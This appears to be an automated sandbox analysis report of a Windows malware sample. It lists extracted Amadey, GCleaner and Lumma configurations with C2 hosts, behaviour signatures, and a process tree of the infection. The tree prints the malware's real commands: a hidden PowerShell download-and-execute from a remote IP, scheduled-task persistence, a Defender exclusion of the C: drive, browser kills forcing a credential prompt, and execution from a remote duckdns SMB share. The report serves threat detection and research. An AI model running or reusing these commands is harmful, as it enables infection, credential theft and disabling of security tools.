Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2025, 02:57

General

  • Target

    2025-04-05_651cce28cb328014db2aa67beb299d98_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    651cce28cb328014db2aa67beb299d98

  • SHA1

    c48a43ceaf77424b36442b365255312cfed70b62

  • SHA256

    11b24a02e9953184f9dd73569592fc4990b18cd2255e7cece0ae164631e3a8e9

  • SHA512

    c70674ce01acbb6febae898317b217408a35cea4cf17ebcedfe553422979bcc4ad2a1afac4769297c0f445323d8436e497ebe0cd6c1cfe0eca2144856b74ca7e

  • SSDEEP

    24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:CTvC/MTQYxsWR7a09

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Extracted

Family

lumma

C2

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://cosmosyf.top/GOsznj

https://yjrxsafer.top/shpaoz

https://krxspint.digital/kendwz

https://rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

https://xrfxcaseq.live/gspaz

https://6grxeasyw.digital/xxepw

https://gkrxspint.digital/kendwz

https://erhxhube.run/pogrs

https://28jrxsafer.top/shpaoz

https://kadvennture.top/GKsiio

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Detects MeshAgent payload 1 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 21 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 64 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 57 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 29 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-05_651cce28cb328014db2aa67beb299d98_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-05_651cce28cb328014db2aa67beb299d98_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5100
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn NR0tumalefw /tr "mshta C:\Users\Admin\AppData\Local\Temp\KUPQdS2Qf.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5496
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn NR0tumalefw /tr "mshta C:\Users\Admin\AppData\Local\Temp\KUPQdS2Qf.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3504
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\KUPQdS2Qf.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4600
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'T0QUQPHUO8PMQFHUN5OBJUJUGKHI1QYK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2176
        • C:\Users\Admin\AppData\Local\TempT0QUQPHUO8PMQFHUN5OBJUJUGKHI1QYK.EXE
          "C:\Users\Admin\AppData\Local\TempT0QUQPHUO8PMQFHUN5OBJUJUGKHI1QYK.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3340
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3720
            • C:\Users\Admin\AppData\Local\Temp\10455890101\da8fdc21ec.exe
              "C:\Users\Admin\AppData\Local\Temp\10455890101\da8fdc21ec.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5592
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10455890101\da8fdc21ec.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2844
            • C:\Users\Admin\AppData\Local\Temp\10455900101\ed13ccb84a.exe
              "C:\Users\Admin\AppData\Local\Temp\10455900101\ed13ccb84a.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:5620
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10455900101\ed13ccb84a.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2484
            • C:\Users\Admin\AppData\Local\Temp\10455910101\017f211ad7.exe
              "C:\Users\Admin\AppData\Local\Temp\10455910101\017f211ad7.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:5060
            • C:\Users\Admin\AppData\Local\Temp\10455920101\e1bf2d7e63.exe
              "C:\Users\Admin\AppData\Local\Temp\10455920101\e1bf2d7e63.exe"
              6⤵
              • Checks BIOS information in registry
              • Executes dropped EXE
              PID:4520
            • C:\Users\Admin\AppData\Local\Temp\10455930101\4dba8e64e7.exe
              "C:\Users\Admin\AppData\Local\Temp\10455930101\4dba8e64e7.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2372
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3180
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1360
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5112
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4152
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2736
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:1764
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:1624
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {a71a84d1-608f-4775-ae90-ce6a373d2949} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                      9⤵
                        PID:4192
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2468 -prefsLen 27135 -prefMapHandle 2472 -prefMapSize 270279 -ipcHandle 2480 -initialChannelId {e2ddcbfd-7b23-4306-b06e-09fe6f6601f8} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                        9⤵
                          PID:5068
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3836 -prefsLen 25164 -prefMapHandle 3840 -prefMapSize 270279 -jsInitHandle 3844 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3852 -initialChannelId {dd916211-ded5-48e7-8c7f-a6cc318e1cf8} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                          9⤵
                          • Checks processor information in registry
                          PID:4084
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4044 -prefsLen 27276 -prefMapHandle 4048 -prefMapSize 270279 -ipcHandle 4064 -initialChannelId {8e3e86ea-c7cb-4bba-b3cb-4c2d9a0a494a} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                          9⤵
                            PID:3488
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2644 -prefsLen 34775 -prefMapHandle 2704 -prefMapSize 270279 -jsInitHandle 3272 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3132 -initialChannelId {f69f0f48-c5f6-4dcf-97e9-b3870ee058f5} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                            9⤵
                            • Checks processor information in registry
                            PID:2144
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4976 -prefsLen 35012 -prefMapHandle 4980 -prefMapSize 270279 -ipcHandle 4988 -initialChannelId {2f7fef68-befd-4e4a-8017-fcebddeff448} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                            9⤵
                            • Checks processor information in registry
                            PID:552
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5332 -prefsLen 32952 -prefMapHandle 5336 -prefMapSize 270279 -jsInitHandle 5340 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5348 -initialChannelId {cad1cf09-8127-431a-930f-2e00a1a2936c} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                            9⤵
                            • Checks processor information in registry
                            PID:5332
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5560 -prefsLen 32952 -prefMapHandle 5564 -prefMapSize 270279 -jsInitHandle 5568 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5356 -initialChannelId {cbc8f066-6207-43e1-9ef0-62f0733c886d} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                            9⤵
                            • Checks processor information in registry
                            PID:2540
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5584 -prefsLen 32952 -prefMapHandle 5588 -prefMapSize 270279 -jsInitHandle 5592 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5596 -initialChannelId {6ac8849c-8fc2-4342-8adf-183a8b85951a} -parentPid 1624 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1624" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                            9⤵
                            • Checks processor information in registry
                            PID:4120
                    • C:\Users\Admin\AppData\Local\Temp\10455940101\d75088bbd9.exe
                      "C:\Users\Admin\AppData\Local\Temp\10455940101\d75088bbd9.exe"
                      6⤵
                      • Modifies Windows Defender DisableAntiSpyware settings
                      • Modifies Windows Defender Real-time Protection settings
                      • Modifies Windows Defender TamperProtection settings
                      • Modifies Windows Defender notification settings
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Windows security modification
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3596
                    • C:\Users\Admin\AppData\Local\Temp\10455950101\0ab08ceaf9.exe
                      "C:\Users\Admin\AppData\Local\Temp\10455950101\0ab08ceaf9.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1248
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3812
                    • C:\Users\Admin\AppData\Local\Temp\10455960101\9ffa56fbe8.exe
                      "C:\Users\Admin\AppData\Local\Temp\10455960101\9ffa56fbe8.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:868
                    • C:\Users\Admin\AppData\Local\Temp\10455970101\86d12a857b.exe
                      "C:\Users\Admin\AppData\Local\Temp\10455970101\86d12a857b.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:5340
                    • C:\Users\Admin\AppData\Local\Temp\10455980101\0BiRjfE.exe
                      "C:\Users\Admin\AppData\Local\Temp\10455980101\0BiRjfE.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1512
                    • C:\Users\Admin\AppData\Local\Temp\10456000101\larBxd7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456000101\larBxd7.exe"
                      6⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:1220
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:4284
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          8⤵
                          • Enumerates processes with tasklist
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3644
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /I "opssvc wrsa"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:5692
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          8⤵
                          • Enumerates processes with tasklist
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2472
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:744
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c md 689912
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:3944
                        • C:\Windows\SysWOW64\extrac32.exe
                          extrac32 /Y /E Exclusion.psd
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4196
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V "users" Findarticles
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4532
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:1728
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:2880
                        • C:\Users\Admin\AppData\Local\Temp\689912\Jordan.com
                          Jordan.com b
                          8⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:816
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:3996
                    • C:\Users\Admin\AppData\Local\Temp\10456010101\qhjMWht.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456010101\qhjMWht.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3008
                    • C:\Users\Admin\AppData\Local\Temp\10456020101\TbV75ZR.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456020101\TbV75ZR.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4748
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2400
                    • C:\Users\Admin\AppData\Local\Temp\10456030101\05b1faf891.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456030101\05b1faf891.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Writes to the Master Boot Record (MBR)
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2372
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10456041121\pfJNmVW.cmd"
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:5468
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Command "Start-Process cmd -ArgumentList '/c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall' -windowstyle hidden -Verb RunAs; # Cloudflare verification (Ray ID: 90b0e54eb8bdaasd84)
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3612
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234! && \\aaso12.duckdns.org\shear\s -fullinstall
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:4580
                          • C:\Windows\SysWOW64\net.exe
                            net use \\aaso12.duckdns.org\shear /user:WORKGROUP\smbusr aabb1234!
                            9⤵
                            • System Location Discovery: System Language Discovery
                            PID:1220
                          • \??\UNC\aaso12.duckdns.org\shear\s.exe
                            \\aaso12.duckdns.org\shear\s -fullinstall
                            9⤵
                            • Sets service image path in registry
                            • Drops file in Program Files directory
                            PID:5204
                    • C:\Users\Admin\AppData\Local\Temp\10456050101\b5ffafa3c5.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456050101\b5ffafa3c5.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1584
                    • C:\Users\Admin\AppData\Local\Temp\10456060101\trOUuPI.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456060101\trOUuPI.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5296
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:3224
                    • C:\Users\Admin\AppData\Local\Temp\10456070101\but2.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456070101\but2.exe"
                      6⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      PID:5780
                      • C:\Windows\SysWOW64\schtasks.exe
                        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:3800
                      • C:\Windows\SysWOW64\schtasks.exe
                        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
                        7⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:3620
                      • C:\Drivers\pcidrv.exe
                        C:\Drivers\pcidrv.exe
                        7⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:4532
                      • C:\Windows\SysWOW64\cmd.exe
                        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10456070101\but2.exe
                        7⤵
                        • System Location Discovery: System Language Discovery
                        PID:3084
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 2
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Delays execution with timeout.exe
                          PID:3136
                    • C:\Users\Admin\AppData\Local\Temp\10456080101\Rm3cVPI.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456080101\Rm3cVPI.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2252
                    • C:\Users\Admin\AppData\Local\Temp\10456090101\9sWdA2p.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456090101\9sWdA2p.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:5944
                    • C:\Users\Admin\AppData\Local\Temp\10456100101\UZPt0hR.exe
                      "C:\Users\Admin\AppData\Local\Temp\10456100101\UZPt0hR.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: MapViewOfSection
                      PID:5156
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                        7⤵
                          PID:5592
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe Add-MpPreference -ExclusionPath 'C:'
                            8⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1932
                        • C:\Windows\system32\svchost.exe
                          "C:\Windows\system32\svchost.exe"
                          7⤵
                          • Downloads MZ/PE file
                          • Adds Run key to start application
                          PID:4904
                          • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
